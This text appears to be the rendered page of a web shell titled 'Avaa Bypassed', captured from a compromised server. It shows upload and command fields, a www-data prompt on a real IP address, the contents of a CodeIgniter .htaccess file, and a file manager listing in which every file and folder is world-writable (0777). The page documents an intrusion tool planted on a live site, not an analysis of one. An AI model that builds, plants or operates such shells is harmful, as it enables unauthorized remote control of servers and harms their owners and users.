[ Avaa Bypassed ]




Upload:

Command:

www-data@18.117.121.244: ~ $
<IfModule mod_rewrite.c>
RewriteEngine On

# Require HTTPS
RewriteCond %{HTTPS} !=on
RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} [R,L]

# Removing the index.php file - https://codeigniter.com/userguide3
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php/$1 [L]
</IfModule>

Filemanager

Name Type Size Permission Actions
application Folder 0777
assets Folder 0777
assets-olds Folder 0777
ssl Folder 0777
system Folder 0777
temp Folder 0777
.htaccess File 330 B 0777
index-old.php File 10.12 KB 0777
index.php File 0 B 0777
xss_clean.php File 4.7 KB 0777